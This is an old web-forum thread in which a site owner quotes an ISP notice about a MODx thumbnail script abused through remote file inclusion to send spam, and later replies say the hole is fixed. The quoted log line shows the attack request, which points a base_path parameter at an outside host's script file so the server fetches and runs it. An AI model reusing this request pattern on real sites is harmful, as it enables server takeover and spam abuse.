I just got the following e-mail from my ISP:
It has come to our attention that the following script on your web site is exploitable:
/var/www/html/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php
This script is being used by a third party to send out unsolicited email, commonly referred to as
spam. Because of this we've had to disable this script by setting its permissions to '200'.
This script is being exploited using a technique known as 'remote file inclusion'. Here is a snip
from you logs showing the exploit taking place:
38.119.107.77 - - [05/Nov/2006:05:05:03 -0800] "GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://tcc-uk.net/php.txt? HTTP/1.1" 200 1368 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7"
Please delete or secure this script as soon as possible. DO NOT under any circumstances
continue to use this script without first securing it as doing so will result in your account
being temporarily suspended.
I have not changed the permissions on any of these files.
Any thoughts?
"Regret for the things we did can be tempered by time; it is regret for the things we did not do that is inconsolable."
-- Sydney Harris
Never mind, bS` on IRC let me know that this has been fixed...
http://modxcms.com/forums/index.php/topic,8604.0.html
"Regret for the things we did can be tempered by time; it is regret for the things we did not do that is inconsolable."
-- Sydney Harris
-
☆ A M B ☆
- 24,524 Posts
I notice that your ISP makes no mention of the fact that the script was exploitable only because THEY have their php set with register_globals = ON!